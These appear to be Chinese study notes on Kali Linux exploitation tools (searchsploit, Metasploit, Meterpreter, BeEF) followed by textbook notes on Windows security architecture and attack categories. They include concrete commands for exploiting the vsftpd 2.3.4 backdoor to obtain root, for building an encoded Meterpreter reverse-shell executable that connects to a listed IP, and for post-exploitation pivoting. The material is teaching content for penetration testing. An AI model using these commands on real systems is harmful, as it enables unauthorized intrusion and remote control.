kali视频(26-31)(漏洞利用)
漏洞利用之检索与利用
漏洞利用工具集
- 1.searchsploit
Exploit Database->searchsploit
-
2.pattern create测试漏洞
armitage结合MSF进行利用
-
3.jboss-autopwn-linux/win
专门针对Jboss的漏洞利用工具 -
4.ikat
自动化开启,等待目标访问中招。 -
5.termineter
评估智能电表的安全性。
漏洞利用之metasploit基础
1.启动服务:
在kali中使用metasploit,需要先使用命令
service postgresql start
开启PostgreSQL数据库服务,使用命令
msfconsole
2.开启metasploit服务,然后就可以完整的利用msf数据库查询exploit和记录。
3.首先用nmap -sV扫描目标主机和端口上运行的软件的版本。结果显示目标主机运行着ftp服务器,且版本为vsftpd 2.3.4(此版本的vsftpd存在着漏洞,攻击者可以远程获取目标主机的root权限)。
4.输入use exploit/unix/ftp/vsftpd_234_backdoor,提示符提示进入到该路径下,show options查看需要设置的相关项。提示需要设置RHOST和RPORT(端口默认为21)
5.接下来选择payload,输入命令set payload,按Tab键自动补齐攻击载荷cmd/unix/interact,show options查看需要设置的相关项,设置结束后输入exploit即可实施攻击。
- 结果返回目标主机的shell,获取了目标主机的root权限,可以输入命令查看id、网络配置等,攻击也就可以顺利实施。
漏洞利用之Meterpreter介绍
1.生成Meterpreter后门;打开MSF,开启监听(选择exploit/multi/handler);在目标机器上执行door.exe;
2.msfpayload windows/meterpreter/reverse_tcp LHOST=222.28.136.234 LPORT=2333 R | msfencode -t exe -c 5 > /root/door.exe
3.查看自己的IP地址,LHOST、LPORT为reverse_tcp的参数,可以在msf里查看到(记得把服务启动)
4.用use exploit/multi/handler来接收返回的连接
设置reverse_tcp的LHOST、LPORT参数
漏洞利用之Metasploit后渗透测试
- 1.查看跳板机的网卡
ifconfig
- 2.添加路由表
run autoroute -s 10.0.0.1
- 3.开socks代理
background 把session置于后台
search socks 使用socks开代理
use auxiliary/server/socks4a
showoptions
exploit
- 4.通过background和sessions -i可以自由切换进入session
- 5.输入run可以看到在meterpreter上可以做的很多命令
- 6.通过run post/可以看到后渗透测试的模块
- 7.扫描内网信息
run arp_scanner -r 目标IP地址
内网端口转发
upload lcx.exe c: 上传到C盘根目录
漏洞利用之beEf
1、在命令行下启动
BeeFbeef-xss
2、用户名和密码都是beef
3、输入测试网站,可以看到在线机器
4、对网站进行攻击
5、Proxy功能(代理功能)
选中目标主机,点右键,在菜单中选中Use as Proxy;然后在Rider选项卡中的Forge Request编辑并发送想要发送的内容
6、BeEF默认是不加载Metasploit的,如果要使用Metasploit丰富的攻击模块,需要做些配置.
配置
首先打开beef xss目录
cd /usr/share/beef-xss/
ls
nano config.yaml
编辑一下,可以看到有很多配置信息,包括用户名、密码都可以在这设置,在此将Metasploit的false修改为true
漏洞利用之set
第七章 Windows操作系统安全防护
Windows操作系统的发展与现状
Windows在桌面操作系统中占有非常高的市场份额,Windows XP系统在国内仍有大量的用户
Windows操作系统基本结构
1、Windows操作系统内核基本模块:Windows执行体、Windows内核体、设备驱动程序、硬件抽象层、Windows窗口与图形界面接口内核实现代码。
2、Windows操作系统在用户态的代码模块:系统支持进程、环境子系统服务进程、服务进程、用户应用软件、核心子系统DLL。
3、核心机制:Windows进程和线程管理机制、Windows内存管理机制、Windows文件管理机制、Windows注册表管理机制、Windows的网络机制。
Windows系统的网络结构,从OSI网络参考模型的物理层到应用层,各层对应的Windows网络组件模块包括:
①网卡硬件设备驱动程序,位于OSI物理层
②NDIS库及miniport驱动程序,位于OSI链路层
③TDI传输层,也被称为网络协议驱动,位于OSI网络层与传输层
④网络API DLL 及TDI客户端,对应OSI会话层与表示层
⑥网络应用程序与服务进程,对应OSI应用层
**Windows操作系统的安全体系结构与机制 **
1、Windows安全体系结构
基于引用监控器(Reference Monitor)模型来实现基本的对象安全模型。最核心的是位于内核中的SRM(Security Reference Monitor)安全引用监控器,以及位于用户态的LSASS安全服务。
2、Windows身份认证机制
分为用户,用户组,和计算机三大类。对于每个安全主体,以时间和空间上都全局唯一的SID安全标识符来进行标识。
Windows用户密码经过加密处理后被保存于SAM或者活动目录AD中,其中本地用户账户口令信息经过不可逆的128位随机秘钥Hash加密后存储在SAM文件中。
Windows进程、GINA图形化登录窗口,与LSASS服务通过协作来完成本地身份认证过程。
3、Windows授权与访问控制机制
Windows授权与访问控制机制是基于引用监控器模型,由内核中的SRM模块与用户态的LSASS服务共同来实施。
Windows对于系统中所有需要保护的资源都抽象成对象,而对每个对象会关联一个SD安全描述符(Security Descriptor)都会关联一个对象描述符,有以下属性组成:Owner SID、Group SID、DACL 自主访问控制列表、SACL 系统审计访问控制列表。
4、Windows安全审计机制
系统审计策略在本地安全策略中由系统管理员定义,来确定系统对哪些事件进行记录。
5、Windows的其他安全机制
Windows安全中心中集成了对于保护Windows系统安全稳定运行最为关键的三项安全措施:防火墙,补丁自动更新,以及病毒防护。除了安全中心外,Windows的安全特性还包括IPSec加密与验证机制、EFS加密文件系统、Windows文件保护机制、捆绑的IE浏览器所提供的隐私保护与浏览安全保护机制等。
6、Windows远程安全攻防技术
Windows远程攻击技术可分为:远程口令猜测与破解攻击、攻击Windows网络服务、攻击Windows客户端及用户
7、Windows安全漏洞发现、利用与修补过程
安全漏洞公开披露信息库:几个知名的通用漏洞信息库:CVE、NVD、SecurityFocus、OSVDB等。
8、针对特定目标的渗透测试攻击过程:
①漏洞扫描测试
②查找针对发现漏洞的渗透代码
③实施渗透测试
9、使用Metasploit软件实施渗透测试
Metasploit是完全开源的渗透测试软件。采用开发框架和模块组件的可扩展模型,以Ruby语言编写的Metasploit
Framework(MSF)库作为整个软件的基础核心,为渗透测试组件的开发与测试提供平台;模块组件是真正实施渗透攻击的代码。
Metasploit提供了CLI、Console、Web和GUI四种不同的用户交互接口,其中Console终端是比较常用的方式。
10、Windows远程口令猜测与破解攻击
- 远程口令自猜测
- 远程口令字交换通信窃听与破解
- 远程口令猜测与破解防范措施
11、Windows网络服务远程渗透攻击
Windows操作系统默认开放135(TCP),137(UDP),139(TCP)与445(TCP)端口,对应的网络服务为MSRPC与过程调用服务,NetBIOS网络基本输入输出系统服务和SMB文件与打印机共享服务。
- 针对NetBIOS网络服务的著名漏洞及攻击
- 针对SMB网络服务的著名漏洞及攻击
- 针对MSRPC网络服务的著名漏洞及攻击
- 针对Windows系统上微软网络服务的远程渗透攻击
- 针对Windows系统上第三方网络服务的远程渗透攻击
12、网络服务远程渗透攻击防范措施
- Windows本地安全攻防技术
- Windows本地特权提升
- 终极特权:Administrator或者Local System账户。从受限用户权限尝试获得特权账户的攻击技术也被称为特权提升。
13、Windows敏感信息窃取
- Windows系统口令字密文提取技术
- Windows系统口令字破解技术
- 用户敏感数据窃取
- 本地敏感信息窃取防范措施
14、Windows消踪灭迹
- 关闭审计功能
- 清理事件日志
- 针对消踪灭迹的防范措施
15、Windows远程控制与后门程序
- 命令行远程控制工具
- 图形化远程控制工具
- 针对后门程序防范措施
